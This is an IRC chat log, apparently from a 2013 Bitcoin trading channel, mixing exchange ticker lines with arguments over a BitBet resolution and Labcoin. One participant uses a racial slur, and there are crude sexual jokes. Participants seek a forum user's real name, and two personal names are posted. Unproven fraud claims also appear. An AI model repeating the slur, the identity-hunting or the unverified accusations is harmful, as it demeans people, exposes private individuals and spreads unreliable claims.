03:35:16 reality shows pay now ?! Sep 19 03:35:27 well, i thought the winners got paid? Sep 19 03:35:43 [BTCTC] [S] [ASICMINER-PT] 6 @ 1.78266666 = 10.696 BTC [-] {4} Sep 19 03:36:14 set of steak knives ? Sep 19 03:36:19 i guess some just do it for the 'fame' Sep 19 03:36:44 [BTCTC] [S] [ASICMINER-PT] 1 @ 1.78 BTC [-] Sep 19 03:37:37 or the IRL equivalent of sticking a sharpie in your ass for a btc Sep 19 03:38:10 "some". it used to be porn actresses were paid, but by now it's mostly hookers Sep 19 03:38:15 ahem. i mean escorts. Sep 19 03:38:28 doing it to be able to say they are published writers. Sep 19 03:38:36 oslt Sep 19 03:39:47 [BTCTC] [S] [ASICMINER-PT] 9 @ 1.79 = 16.11 BTC [+] Sep 19 03:45:02 and speaking of cocksucker blues, Sep 19 03:45:10 this is a train designed to BLOW SNOW : http://www.toddicus.com/skagway%20snow%20train%20mover.JPG Sep 19 03:45:52 [BTCTC] [S] [LABCOIN] 50 @ 0.00274837 = 0.1374 BTC [-] {3} Sep 19 03:46:32 reminds me of http://www.granddistraction.com/wp-content/uploads/2009/04/tbm.jpg Sep 19 03:46:58 is there any info on the discovery asset? like who runs it and what their experience / proof of competency is? Sep 19 03:48:01 im pretty sure there's no proof of competency. Sep 19 03:48:31 asciilifeform what's that, uranium centrifuge ? Sep 19 03:48:55 [BTCTC] [S] [LABCOIN] 145 @ 0.00280335 = 0.4065 BTC [+] {7} Sep 19 03:49:37 Urushiol: tyrion of ADDICTION runs it Sep 19 03:49:43 tunnel digger. Sep 19 03:49:53 looked stationary. Sep 19 03:49:56 as in, everybody's metro Sep 19 03:50:26 there's caterpillars down there somewhere. Sep 19 03:50:37 jesus christ, chrome has taken over the internet. 69k / 200k visits today come via chrome Sep 19 03:50:48 when has this happened ?! Sep 19 03:51:01 https://bitcointalk.org/index.php?topic=125629.msg3186052#msg3186052 Sep 19 03:51:07 [BTC-TC] Virtual Community Exchange w/ Options, DRIP, 2FA, API, CSV, etc. Sep 19 03:51:30 ff 44k, msi 17k, i guess microsoft is pretty much dead huh. Sep 19 03:52:31 pankkake deprived reads pretty sane. now wtf is qwith the usagi acquisition ? he ever explain ? Sep 19 03:52:41 he did Sep 19 03:52:59 [HAVELOCK] [S] [CBTC] 566 @ 0.00044 = 0.249 BTC [+] Sep 19 03:53:04 it seems to be low risk for *him*, but I haven't read the details Sep 19 03:53:29 https://bitcointalk.org/index.php?topic=125629.msg3186110#msg3186110 Sep 19 03:53:33 [BTC-TC] Virtual Community Exchange w/ Options, DRIP, 2FA, API, CSV, etc. Sep 19 03:53:33 o look at that. Sep 19 03:56:02 http://www.reddit.com/r/Bitcoin/comments/1mcyrb/labcoin_crashes_as_news_reveals_lies/ Sep 19 03:56:04 somewhat lulzy. Sep 19 03:57:38 Labcoin crashes as news reveals lies : Bitcoin Sep 19 04:01:07 [BTCTC] [S] [LABCOIN] 233 @ 0.00282635 = 0.6585 BTC [+] {4} Sep 19 04:01:10 >>>So let me get this right. Someone mined 3 BTC and sent it to the Labcoin wallet to cause a price spike? Sep 19 04:01:10 Which I bought into. Sep 19 04:01:10 How dumb am I? What kind a person does this? Sep 19 04:01:11 LMAO Sep 19 04:01:43 "Obviously, I'm just pointing out that MP is the Carrot Top of investment advice" Sep 19 04:01:56 "Scott Thompson (born February 25, 1965), better known by his stage name Carrot Top, is an American comedian, known for his bright red hair, prop comedy, and self-deprecating humor." Sep 19 04:02:07 dude... nothing matches. red hair, me ? self-deprecating humor ?! Sep 19 04:02:08 [BTCTC] [S] [TAT.ASICMINER] 8 @ 0.01743 = 0.1394 BTC [+] Sep 19 04:02:23 I'd just reply with "If you have Labcoin shares (and don't have inside knowledge) you ARE a fucking idiot. There's no grey area on that." Sep 19 04:02:24 what the fuck, you could pick a better matching comedian throwing darts Sep 19 04:02:45 you throw darts? Sep 19 04:03:12 i sometimes throw darts. Sep 19 04:03:19 this is why i like girls with meaty tails. Sep 19 04:03:41 nice Sep 19 04:04:04 so what comedian would you matched to? Sep 19 04:04:16 hm. Sep 19 04:04:18 +be Sep 19 04:04:47 well, i dunno. don rickles if i want to flatter myself ? Sep 19 04:04:55 i mean, he says nigger all the time, right ? Sep 19 04:06:08 widely known as an insult comic Sep 19 04:06:11 nice Sep 19 04:06:12 [BTCTC] [S] [LABCOIN] 500 @ 0.002789 = 1.3945 BTC [-] Sep 19 04:07:09 actually he's widely known as "mr warmth" Sep 19 04:09:15 [BTCTC] [S] [LABCOIN] 118 @ 0.00279012 = 0.3292 BTC [+] {2} Sep 19 04:10:16 [BTCTC] [S] [LABCOIN] 2471 @ 0.00280365 = 6.9278 BTC [+] {4} Sep 19 04:11:17 [BTCTC] [S] [LABCOIN] 529 @ 0.002835 = 1.4997 BTC [+] Sep 19 04:11:55 Since we're doing Casino : "Ace Rothstein: Listen, if you didn't know you're bein' scammed, you're too fuckin' dumb to keep this job. If you did know, you were in on it. Either way, you're out. Get out! Go on. Let's go." Sep 19 04:15:11 ;;google don rickles Sep 19 04:15:12 Don Rickles - Wikipedia, the free encyclopedia: ; Don Rickles: ; Don Rickles - IMDb: Sep 19 04:15:41 don rickles is so old Sep 19 04:15:52 "I'm Mr. Potato head" Sep 19 04:16:20 http://www.imdb.com/title/tt1979376/?ref_=nm_flmg_act_1 - seriously? Sep 19 04:16:23 Toy Story 4 - IMDb Sep 19 04:16:29 yeah, but he's the only guy mocking obama out there. Sep 19 04:16:41 not jon steward? Sep 19 04:16:49 or stephen colbert? Sep 19 04:17:09 not afaik. what they say ? Sep 19 04:17:51 https://www.google.com/#q=jon%20stewart%20slams%20obama Sep 19 04:17:53 Google Sep 19 04:17:54 “President Obama is a personal friend of mine. He was over to the house yesterday, but the mop broke.” Sep 19 04:18:04 it's pretty funny usually worth watching Sep 19 04:18:51 stewarts an equal opportunity hater, it's why i like him Sep 19 04:19:31 always a good thing that. Sep 19 04:22:28 [BTCTC] [S] [ASICMINER-PT] 1 @ 1.802 BTC [+] Sep 19 04:23:03 http://newsbusters.org/blogs/matthew-sheffield/2013/09/04/jon-stewart-latest-media-lib-blast-obama-syria-war-plans Sep 19 04:23:15 that has a pretty good treanscript Sep 19 04:23:22 OBAMA: We have been very clear to the Assad regime but also to other players on the ground that a red line for us is we start seeing a whole bunch of chemical weapons moving around or being utilized. Sep 19 04:23:27 STEWART: See the red line. You can.t use chemicals to kill your own people. You have to do it organically! America and the world want to make sure Assad only uses locally sourced, free-long-range land ordinance. Sep 19 04:23:29 [BTCTC] [S] [ASICMINER-PT] 2 @ 1.808 = 3.616 BTC [+] {2} Sep 19 04:23:59 Now, back in the early .80s, we knew that Iraq used chemical weapons against Iran and were likely to use them again. Not only did we not attack them, we supported Iraq in doing it. And of course, we still reserve the right to use bunker-busters, cluster bombs, and the Mark 77 which is not, not filled with napalm, technically. Sep 19 04:24:37 soooo i mean rickles isn't the only one talking out against obama Sep 19 04:25:31 [BTCTC] [S] [ASICMINER-PT] 2 @ 1.82 = 3.64 BTC [+] Sep 19 04:27:11 they seem quite on different levels. Sep 19 04:27:34 [BTCTC] [S] [ASICMINER-PT] 1 @ 1.784 BTC [-] Sep 19 04:27:58 how so? Sep 19 04:28:04 steward is definitely for lemmings Sep 19 04:28:19 since he actively knows only stoners watch his show regularly Sep 19 04:28:34 [MPEX] [S] [S.MPOE] 3498 @ 0.00091399 = 3.1971 BTC [-] Sep 19 04:28:37 "Put down the bong, the pope isn't coming" and such comments Sep 19 04:28:41 saying "take this twenty and give it to your sister" is one thing. saying "well i hear a certain young lady has seen more things than you'd expect" it's quite another. Sep 19 04:30:41 stewart* Sep 19 04:30:43 http://i.imgur.com/l39e52c.jpg - relevant Sep 19 04:31:37 [BTCTC] [S] [ASICMINER-PT] 1 @ 1.752 BTC [-] Sep 19 04:32:37 lol Sep 19 04:32:38 [BTCTC] [S] [TAT.ASICMINER] 10 @ 0.0174 = 0.174 BTC [-] Sep 19 04:33:10 that's a pretty bad tie. Sep 19 04:34:40 [BTCTC] [FN] [BTC-GROWTH] 32 @ 0.09714062 = 3.1085 BTC [-] {4} Sep 19 04:35:41 [BTCTC] [S] [LABCOIN] 426 @ 0.00264825 = 1.1282 BTC [-] {11} Sep 19 04:37:43 [BTCTC] [S] [LABCOIN] 5000 @ 0.00256124 = 12.8062 BTC [-] {4} Sep 19 04:38:44 [BTCTC] [S] [BMF] 75 @ 0.03385333 = 2.539 BTC [+] {4} Sep 19 04:38:44 [BTCTC] [S] [TAT.ASICMINER] 29 @ 0.01736 = 0.5034 BTC [-] Sep 19 04:38:44 [BTCTC] [S] [LABCOIN] 908 @ 0.0025479 = 2.3135 BTC [-] {3} Sep 19 04:40:03 So mircea, would you be willing to at least independently acknowledge that this data shows Gox having less than 50% of btc volume on Aug 28? http://data.bitcoinity.org/#caaaaadgaa Sep 19 04:40:46 [BTCTC] [S] [TAT.ASICMINER] 71 @ 0.01735098 = 1.2319 BTC [-] {2} Sep 19 04:41:51 i can't load it. how'd i go about that ? Sep 19 04:41:57 put the page as a pastebin somewhere ? Sep 19 04:42:06 it's graphical Sep 19 04:42:12 use Chrome, like everybody else Sep 19 04:42:15 :) Sep 19 04:42:28 lol well, i'm willing to acknowledge i don't use chrome. Sep 19 04:42:36 so put it as a screenshot. Sep 19 04:42:48 loads in Opera for me Sep 19 04:43:50 anyway, since i'm stuck guessing : your link probably onyl counts mtgoxusd. Sep 19 04:44:02 there's also eur, jpy, and whatever the fuck else, like 4-5 things. Sep 19 04:44:11 this was discuissed on the bet comments on like two different passes. Sep 19 04:44:14 its all currencies Sep 19 04:44:17 is it ? Sep 19 04:44:19 yes Sep 19 04:44:30 yea it's all them Sep 19 04:44:53 currency: "all currencies" Sep 19 04:45:11 but does that actually correctly include the same thing as the bitcoincharts includes. Sep 19 04:45:23 i mean, "all currencies" might mean anything. Sep 19 04:45:35 http://imgur.com/wykMkTr Sep 19 04:45:36 imgur: the simple image sharer Sep 19 04:46:43 thats the chart Sep 19 04:46:48 here is the currency list Sep 19 04:46:49 http://imgur.com/UZ7SKmQ Sep 19 04:46:54 imgur: the simple image sharer Sep 19 04:47:19 well now we know for a fact it's not good : the bitcoincharts site doesn't include this bit2c thing Sep 19 04:47:43 also i don't see no rmbtb Sep 19 04:47:57 including more exchanges would only help my case Sep 19 04:48:01 there are roughly 5 chinese rmb exchanges Sep 19 04:48:16 ThickAsThieves how do you reason ? Sep 19 04:48:28 if you're half of your household including more girlfriends makes you more or less a % ? Sep 19 04:48:34 gox's pie would decrease more Sep 19 04:48:46 exactly ? Sep 19 04:48:54 [BTCTC] [S] [TAT.ASICMINER] 52 @ 0.01679 = 0.8731 BTC [-] {2} Sep 19 04:49:00 yes the bet says gox will have less than 50% Sep 19 04:49:02 which is why your substitute source is no good : it includes more things. Sep 19 04:49:03 yes no Sep 19 04:49:14 it resolved no Sep 19 04:49:19 right... Sep 19 04:49:38 but this chart shows it had less than 50% Sep 19 04:49:42 on Aug 28 Sep 19 04:49:54 on some substitute source wherein a lot of other exchanges were counted. Sep 19 04:49:55 adding more competition of exchanges would make gox even lower Sep 19 04:49:55 [BTCTC] [S] [LABCOIN] 400 @ 0.00255 = 1.02 BTC [-] {2} Sep 19 04:49:59 exactly. Sep 19 04:50:13 oh so you mean this page has more than bitocincharts has? Sep 19 04:50:19 yes. Sep 19 04:50:31 mtgoxUSD, bitstampUSD, btcnCNY, btceUSD, mtgoxEUR, mtgoxJPY, btcdeEUR, cbxUSD, mtgoxGBP, mtgoxCAD, bitcurexPLN, btceRUR, virtexCAD, mtgoxAUD, virwoxSLL Sep 19 04:50:56 [BTCTC] [S] [ACTIVEMINING] 385 @ 0.002585 = 0.9952 BTC [-] Sep 19 04:51:21 Ukyo it's true, but it's also damned hard to distinguish who's serious etc. gotta pick some sort of a fixed criterion. Sep 19 04:51:56 [BTCTC] [S] [LABCOIN] 100 @ 0.00254994 = 0.255 BTC [-] {2} Sep 19 04:52:25 on that day, bitstamp alone had 14k Sep 19 04:52:31 gox had 15k Sep 19 04:53:02 ad campbx Sep 19 04:53:04 add* Sep 19 04:53:08 and gox is at <50% Sep 19 04:53:58 i find it suspicious mtgox is one single thing, and i find it suspicious that thing is 2 digit precise. Sep 19 04:53:58 [BTCTC] [S] [LABCOIN] 1837 @ 0.00242511 = 4.4549 BTC [-] {9} Sep 19 04:54:16 anyway. all this would have been way more useful sometime around august the 8th Sep 19 04:54:18 it does 1 decimal Sep 19 04:54:30 well what is 15k ? Sep 19 04:54:33 the issue is that a dynamic chart shouldnt be allowed Sep 19 04:54:38 as a data point Sep 19 04:54:51 since there is no way to prove yay/nay Sep 19 04:54:59 [BTCTC] [S] [LABCOIN] 295 @ 0.00241989 = 0.7139 BTC [-] {2} Sep 19 04:55:03 sure it is. what happened to claiming it ? Sep 19 04:55:14 ? Sep 19 04:55:25 you know, any of the interested partioes going "HEY! This bet is won!" Sep 19 04:55:41 because no one person was looking at it all times Sep 19 04:55:45 tough. Sep 19 04:55:50 it's bitbet's job Sep 19 04:55:53 to resolve it Sep 19 04:55:59 not the bettors Sep 19 04:56:20 reality is reality, whether bettors point it out or not Sep 19 04:56:32 well, reality so far is "no". Sep 19 04:56:38 show me Sep 19 04:56:53 that's the story here : bitbet enacts reality. that's all i do to show you : point to the bitbet decision. Sep 19 04:56:57 you disagree, you show me. Sep 19 04:57:27 so bitbet has no responsibility for it's resolutions to reflect reality? Sep 19 04:57:31 its* Sep 19 04:57:35 bitbet resolutions ARE reality. Sep 19 04:57:38 LOL. Sep 19 04:57:52 how about the data used to make them? Sep 19 04:57:55 Classic mircea_popescu. Sep 19 04:57:59 this is like going "o, the court should show me". dude... you got a case, show your case. you don't got no case... that's what it is. Sep 19 04:58:08 haha. Sep 19 04:58:27 Yes. Bitbet = habeas corpus Sep 19 04:58:27 well, the data, sure. but it has to be THE data. Sep 19 04:58:42 would you mind sharing the data used to resolve it? Sep 19 04:58:48 Kleeck__ no but it's not practical to have bitbet store details in any degree of detail permanently. Sep 19 04:59:00 yknow how lawyers share their data Sep 19 04:59:02 ThickAsThieves i would, cause it'd create untenable precedent. Sep 19 04:59:04 please disclose Sep 19 04:59:24 cant use court as justification Sep 19 04:59:34 without same allowances Sep 19 04:59:35 it's economically unfeasible to require bitbet to permanently maintain records of everything. it's also kinda against the entire concept of bitcoin. Sep 19 04:59:49 it'll take you more time dealing with me than just showing me Sep 19 04:59:53 What a perfect position you've created for yourself MP. Bitbet = Reality, but it can't reveal how it comes to it's conclusions. :P Sep 19 05:00:32 it's not a matter that it can't reveal tho. Sep 19 05:00:35 so you concur the court case justification is not applicable here? Sep 19 05:00:44 nope. Sep 19 05:01:10 so it's some kind of court where everyone has to use facts but you? Sep 19 05:01:10 Sounds scammy. Sep 19 05:01:53 ThickAsThieves pretty much. bitbet is the authority. there's not some other authority to which bitbet submits facts Sep 19 05:02:01 and emphatically that putative authority isn't any user. Sep 19 05:02:02 not true Sep 19 05:02:08 the authority is named in the bet Sep 19 05:02:13 meanwhile, users are welcome to bring their cases before the supreme tribunal \which is bitbet. Sep 19 05:02:13 bitcoincharts Sep 19 05:02:24 that's the trier of fact as it were. Sep 19 05:03:07 [BTCTC] [S] [LABCOIN] 1800 @ 0.0024014 = 4.3225 BTC [-] {6} Sep 19 05:03:08 [BTCTC] [S] [TAT.ASICMINER] 38 @ 0.01676 = 0.6369 BTC [-] Sep 19 05:03:14 i'm merely asking for bitbet to assert its good faith to the court by disclosing how it knew gox was never <50% before sept Sep 19 05:03:23 bitbet is the court. Sep 19 05:03:40 is the court allowed to make decisions that conflict with reality Sep 19 05:03:48 that;'s the point, and that's a giood half of the value and utility of bitbet to the community. Sep 19 05:04:02 teaching people how to work in an actually structured system, rather than floating in this internet vague. Sep 19 05:04:08 [BTCTC] [S] [TAT.ASICMINER] 7 @ 0.01679 = 0.1175 BTC [+] Sep 19 05:04:38 anyway, decisions that conflict with reality aren't at issue here. reality isn't what you feel it is, it's what you can prove it is. Sep 19 05:04:43 bring that proof. Sep 19 05:05:06 i'm not sure the court gives me any avenue for doing so Sep 19 05:05:20 well, there's the bitcoincharts site. Sep 19 05:05:24 the link stated in the bet is dynamic Sep 19 05:05:34 looky, you can't argue "i had a proof but i ated it". Sep 19 05:05:35 is it on archive.org? Sep 19 05:05:42 any moment where it was <50% in Aug is not able to be displayed on that link Sep 19 05:05:55 that's unfortunate, but not novel. Sep 19 05:06:06 unless tactm changed how bitcoincharts operates since the bet was made. Sep 19 05:06:26 archive.org is not bitcoincharts.org, the court will argue Sep 19 05:06:41 archive.org would work actually. Sep 19 05:07:31 it did not archive that day, and the charts dont load Sep 19 05:07:46 pronly due to them being dynamic Sep 19 05:07:55 i'd have been surprised if this thing was amenable to some sort of resolution ;/ Sep 19 05:08:14 hey, do the graphs get constructed out of the request somehow ? Sep 19 05:08:30 nope Sep 19 05:08:36 alternatively, you could maybe bug tactm (the owner) to check. Sep 19 05:09:22 info@bitcoincharts.com? Sep 19 05:09:34 or does he IRC? Sep 19 05:09:45 well i don't see him on atm. Sep 19 05:11:02 Was this another bitbet? Sep 19 05:12:16 [BTCTC] [S] [TAT.ASICMINER] 32 @ 0.0167 = 0.5344 BTC [-] Sep 19 05:13:17 [BTCTC] [S] [COGNITIVE] 11 @ 0.15501818 = 1.7052 BTC [-] {2} Sep 19 05:13:18 [BTCTC] [S] [LABCOIN] 826 @ 0.00240177 = 1.9839 BTC [+] {3} Sep 19 05:13:30 jesus this is a two week + old resolution ? Sep 19 05:13:37 ThickAsThieves srsly, what have you been waiting for ?! Sep 19 05:14:03 lolol Sep 19 05:14:19 [BTCTC] [S] [LABCOIN] 69 @ 0.00246933 = 0.1704 BTC [+] {2} Sep 19 05:14:24 also, bitcoinity is doing daily averages, but it seems to me bitcoincharts is doing 30 day averages. Sep 19 05:16:12 well i had a number of bets, all of which i was sure i won and i was digging through emails and saw notifications of .00001 deposits on one of my betting addresses Sep 19 05:16:16 so i investigated Sep 19 05:16:21 [BTCTC] [S] [TAT.ASICMINER] 50 @ 0.01668499 = 0.8342 BTC [-] {3} Sep 19 05:16:39 it's not exactly easy to keep tabs on bitbets Sep 19 05:16:45 should have an optional email notfi Sep 19 05:16:52 notification* Sep 19 05:17:00 hm Sep 19 05:17:10 not really great for user privacy that. Sep 19 05:17:20 it's good to have options Sep 19 05:17:37 some emails can be pretty damn private Sep 19 05:17:56 you can gpg it if it makes you feel better ;) Sep 19 05:18:00 o_0 Sep 19 05:18:05 currently bitbet retains no user info of any kind. there is value in this model. Sep 19 05:18:26 maybe an rss of resolutions? Sep 19 05:18:33 i thought there was ? Sep 19 05:19:15 kakobrekla does bitbet have a resolutions rss ? Sep 19 05:21:55 there is an RSS feed (http://bitbet.us/rss/), and a twitter feed (@BitBets), but neither broadcast bet resolutions yet. Sep 19 05:22:03 it would also be cool if the headers on the homepage linked to full displays of that category Sep 19 05:22:12 like if I click the black Resolutions text Sep 19 05:22:14 What a perfect position you've created for yourself MP. << this happens to be how business works, incidentally. you do a narrowly defined, specified thing. you never do "everything", ie, unbounded obligations. Sep 19 05:22:19 it would take me to all resolutions Sep 19 05:22:27 [MPEX] [S] [S.MPOE] 14637 @ 0.000913 = 13.3636 BTC [-] Sep 19 05:22:47 or accurately resolving bets as a service Sep 19 05:22:52 much too specific Sep 19 05:23:09 (digging myself in a hole here if i'm wrong, i know...) Sep 19 05:23:17 lol Sep 19 05:23:20 yeah, you can just click the link in the tweet/rss stream and it takes you to the bet results. Sep 19 05:23:48 i think some small RSS icons next to resolved and closed topics would prolly be useful. Sep 19 05:24:00 i mena literally clicking the word "RESOLVED" Sep 19 05:24:07 to do what ? Sep 19 05:24:09 to see headlines for ALL resolved bets Sep 19 05:24:22 paginated if needed Sep 19 05:24:28 you know you can just search for that. Sep 19 05:24:32 i know Sep 19 05:24:34 select all / resolved in search box. Sep 19 05:24:44 but too many clicks bro bro Sep 19 05:24:58 this i a point. Sep 19 05:25:06 makes me have to think n stuff Sep 19 05:25:13 cater to my impulses plz Sep 19 05:25:17 this is gambling after all Sep 19 05:26:01 hey, the calculator did get put in :D Sep 19 05:26:11 yep, it's dope Sep 19 05:26:20 and in a format i actually like. Sep 19 05:27:31 i emailed tactm, so we'll see if he actually responds Sep 19 05:28:14 can yopu check bitcoinity for current mtgox % ? Sep 19 05:28:33 [BTCTC] [S] [DMS.MINING] 500 @ 0.00232956 = 1.1648 BTC [-] {10} Sep 19 05:28:41 only using that alpha charts page i linked Sep 19 05:29:17 hm ? Sep 19 05:29:26 http://data.bitcoinity.org/#caaaaadgaa Sep 19 05:29:27 no, what i mean is, bitcoincharts currently shows mtgox as Sep 19 05:29:28 { label: "mtgoxUSD", data: 37}, { label: "mtgoxEUR", data: 6}, { label: "mtgoxJPY", data: 3}, { label: "mtgoxGBP", data: 1}, { label: "mtgoxCAD", data: 1}, { label: "mtgoxAUD", data: 1}, Sep 19 05:29:29 Bitcoinity.org Sep 19 05:29:37 which adds up to 49% Sep 19 05:29:50 now, the only way mtgox has 49% is if these are averages for the past 30 days. Sep 19 05:29:56 otherwise there's no way. Sep 19 05:30:10 ah Sep 19 05:30:26 and if indeed that's the case then we definitely have a problem with the daily averaged bitcoinity data. Sep 19 05:30:35 [BTCTC] [S] [TAT.ASICMINER] 29 @ 0.01663206 = 0.4823 BTC [-] {2} Sep 19 05:30:49 tis alpha anyway Sep 19 05:31:02 what's alpha ? Sep 19 05:31:19 data.bitcoinity.org Sep 19 05:31:24 o o. Sep 19 05:31:31 i didnt expect you take take the source to change the bet Sep 19 05:31:36 [BTCTC] [S] [TAT.ASICMINER] 25 @ 0.0166388 = 0.416 BTC [+] {2} Sep 19 05:31:36 [BTCTC] [S] [LABCOIN] 46 @ 0.002496 = 0.1148 BTC [+] Sep 19 05:31:49 just to acknowledge that what it showed for that date was such Sep 19 05:32:01 well that's why those links are in there (bet judged by X source). so these sorts of disputes can be dispatched. Sep 19 05:32:05 partly to make sure i wasnt crazy to spend any time on this Sep 19 05:32:17 o Sep 19 05:32:25 i just wish the source chosen was not dymanic Sep 19 05:32:29 kinda shit Sep 19 05:32:37 well yeah. not sure what to do about that. Sep 19 05:32:47 dont allow it? Sep 19 05:32:52 i mean... on one hand forbidding bets of the sort seems strange, as the people aren't obliged to bet on it. Sep 19 05:32:56 for bets of this natue Sep 19 05:33:07 well the bet wouldve been fixed simply, Sep 19 05:33:14 name the closing date as the measure Sep 19 05:33:28 instead it said any time Sep 19 05:33:37 yet gave no way to see every time Sep 19 05:33:38 [BTCTC] [S] [BTC-BOND] 11 @ 0.01001818 = 0.1102 BTC [-] {2} Sep 19 05:33:41 well yes but entirely different tihngs these. european vs american options. Sep 19 05:33:57 provable vs not provable in this case Sep 19 05:34:18 you couldve been able to say Well when we looked it was not true sorry Sep 19 05:34:38 looky here : out of the three contentious bets so far, the two most problematic ones were the ones which actually were quite provable Sep 19 05:34:39 [BTCTC] [S] [TAT.ASICMINER] 22 @ 0.01665727 = 0.3665 BTC [+] {2} Sep 19 05:34:41 but instead your resolution implies you would have known if it were No Sep 19 05:34:45 the bet creator should provide a shell script able to determine the bet outcome! Sep 19 05:34:47 (that bfl didn't deliver ands that bitfury did) Sep 19 05:34:50 but i suspect you wouldnt have known Sep 19 05:35:58 the fact is there is total ability for the bet to resolve incorrectly if no one is always watching the page and no historical data is served by the page Sep 19 05:36:25 i somehow doubt a bet with 100 btc riding on it literally had nobody giving a shit. Sep 19 05:36:37 i mean this is the internet. what else are people to do ? Sep 19 05:36:44 i didnt watch it Sep 19 05:36:46 :/ Sep 19 05:36:51 obv i should have Sep 19 05:37:20 and i do represent the entire internet Sep 19 05:37:21 sooooo Sep 19 05:38:20 lolk Sep 19 05:38:28 anyway, can you see what % mtgox has on bitcoinity for today ? Sep 19 05:38:44 24h? Sep 19 05:38:54 the same thing as what you used for the 8th of aug or w/e it was Sep 19 05:39:03 sure, sec Sep 19 05:39:15 i'm trying to compare things here so as to see how the two items rate. Sep 19 05:39:37 it has 18.2k for gox, Sep 19 05:40:27 bitstamp 13.0k 37.52% Sep 19 05:40:27 mtgox 11.1k 32.02% Sep 19 05:40:27 btce 3.66k 10.58% Sep 19 05:40:27 localbitcoins 2.62k 7.58% Sep 19 05:40:27 btcchina 1.53k 4.42% Sep 19 05:40:27 campbx 790 2.28% Sep 19 05:40:28 rmbtb 739 2.14% Sep 19 05:40:28 cavirtex 619 1.79% Sep 19 05:40:29 bitcurex 558 1.61% Sep 19 05:40:29 justcoin 16.6 0.05% Sep 19 05:40:30 bit2c 0.500 0.00% Sep 19 05:40:37 hrm Sep 19 05:40:40 Link to the bet? Sep 19 05:40:41 o we gotta add all this shit ? Sep 19 05:40:45 [BTCTC] [S] [BTC-BOND] 27 @ 0.01034814 = 0.2794 BTC [+] {2} Sep 19 05:40:45 [HAVELOCK] [S] [HIM] 20 @ 0.18999 = 3.7998 BTC [+] Sep 19 05:40:46 [HAVELOCK] [S] [AM100] 21 @ 0.01700714 = 0.3571 BTC [-] {3} Sep 19 05:40:50 i'm not sure wtf Sep 19 05:41:06 i think the day chart does not include today Sep 19 05:41:10 but the 24h does Sep 19 05:41:24 conflicting data Sep 19 05:41:27 ;;calc 18.2 / (18.2+13+11.1+3.66+2.62+790+619+558) Sep 19 05:41:27 0.00902965895673 Sep 19 05:41:34 lol Sep 19 05:41:40 ;;calc 18.2 / (18.2+13+11.1+3.66+2.62+.790+.619+.558) Sep 19 05:41:41 0.360060933389 Sep 19 05:41:46 [HAVELOCK] [S] [HIM] 2 @ 0.185 = 0.37 BTC [-] Sep 19 05:41:47 [BTCTC] [B] [CIPHERMINE.B1] 43 @ 0.01055 = 0.4537 BTC [+] Sep 19 05:41:52 see, according to this graph mtgox for today is at 36^ Sep 19 05:41:58 according to bitcoincharts, mtgox for today is at 49% Sep 19 05:42:02 37.52% Sep 19 05:42:05 i tell you, they don't average over the same period. Sep 19 05:42:06 it's in my paste :) Sep 19 05:42:59 well btccharts shows 38% Sep 19 05:43:04 if they are rounding up Sep 19 05:43:08 then we're spot on Sep 19 05:43:14 Kleeck__ http://bitbet.us/bet/460/mt-gox-to-have-50-trade-volume/ Sep 19 05:43:14 oh Sep 19 05:43:25 hey tat, sorry to interrupt the talk - do you have any info on https://bitcointalk.org/index.php?action=profile;u=82760 like a real name or so? you gave him a trust rating Sep 19 05:43:25 that doesnt include the mini gox slices Sep 19 05:43:42 sec i'll check Sep 19 05:43:51 forum is slow for me atm Sep 19 05:43:51 thanks Sep 19 05:44:15 whats the name? Sep 19 05:44:21 That's one of the better bets I've seen. Not a block of text with poor wording. Sep 19 05:44:36 Sep 19 04:43:50 anyway, since i'm stuck guessing : your link probably onyl counts mtgoxusd. Sep 19 05:44:38 you noob you! Sep 19 05:44:49 [BTCTC] [S] [LABCOIN] 320 @ 0.002472 = 0.791 BTC [-] Sep 19 05:44:52 But still lacks specificity. Why not LIST the exchanges that count towards it? Sep 19 05:44:54 dexx7 Sep 19 05:44:58 if you read my rating Sep 19 05:44:59 ThickAsThieves: sam noi, fabrizio tatti Sep 19 05:45:05 it says I hosted escrow Sep 19 05:45:10 and the deal went fine Sep 19 05:45:13 yes Sep 19 05:45:17 but maybe, maybe he did mention it via pm Sep 19 05:45:18 thats the extent of it Sep 19 05:45:31 i'll look at pms from the day Sep 19 05:45:31 Kleeck__ how would you know aforehand ? Sep 19 05:45:31 sec Sep 19 05:45:48 Be as specific as possible. Sep 19 05:45:59 Is the bet around exchange volumes? What exchanges? Sep 19 05:46:06 that's exactly what it is. as speciffic as possible. Sep 19 05:46:12 No it isn't. Sep 19 05:46:13 wait a sec dexx7 Sep 19 05:46:14 It's broad. Sep 19 05:46:17 the bet was around the exchanges as defined by bitcoincharts. Sep 19 05:46:20 why am i hunting this down anyway Sep 19 05:46:25 plz dont tell me, Sep 19 05:46:32 ThickAsThieves it's "delaria". Sep 19 05:46:34 to determine if labcoin are scams Sep 19 05:46:34 Oh. My fault. Sep 19 05:46:39 I didn't see the bitcoincharts bit. Sep 19 05:46:48 i'm not really sure what i'm looking for, but "labcoin" uses his username "delaria" as skype handle and "delaria" posted some avalon pictures/pool stats labeled with "labcoinx_avalon" etc. Sep 19 05:46:52 Kleeck__ too block of text-y ? :D Sep 19 05:47:00 so that is why Sep 19 05:47:01 :) No. This was a good bet. Sep 19 05:47:06 let me save you the time Sep 19 05:47:11 haha k Sep 19 05:47:12 labcoin is a fucking scam from day 1 Sep 19 05:47:16 there Sep 19 05:47:18 you can rest now Sep 19 05:47:23 I don't use Bitbet because most of the best that appeal to me have shitty wording and lack specificity. Sep 19 05:47:28 we all said so from day 1 Sep 19 05:47:36 you're supposed to say "as mp pointed out, labcoin is a scam from day one." Sep 19 05:47:38 like that reddit guy Sep 19 05:47:50 so why not make better ones ? you get paid even. Sep 19 05:47:50 well i want credit on this one too Sep 19 05:47:51 [BTCTC] [S] [LABCOIN] 46 @ 0.002495 = 0.1148 BTC [+] Sep 19 05:47:51 [BTCTC] [S] [TAT.ASICMINER] 17 @ 0.01682 = 0.2859 BTC [+] Sep 19 05:47:55 :) Sep 19 05:48:04 link me! Sep 19 05:48:08 yeah well, you said so. now proof it. Sep 19 05:48:19 i am the law! Sep 19 05:48:21 lol Sep 19 05:48:26 LOL Sep 19 05:48:29 Classic defense. Sep 19 05:48:36 i'm not calling you out, just saying :) Sep 19 05:48:40 Yeah. Sep 19 05:48:45 ten years from now i'll be long gone on some island somewhere, and people will try to figure out why are all bitcoiners such assholes Sep 19 05:48:48 little will they know... Sep 19 05:48:50 if there is hard proof, it would be good to know Sep 19 05:49:08 yeah. I'd love to see proof, honestly. Sep 19 05:49:09 but anyway, i didn't want to turn this into a lab discussion ;) Sep 19 05:49:53 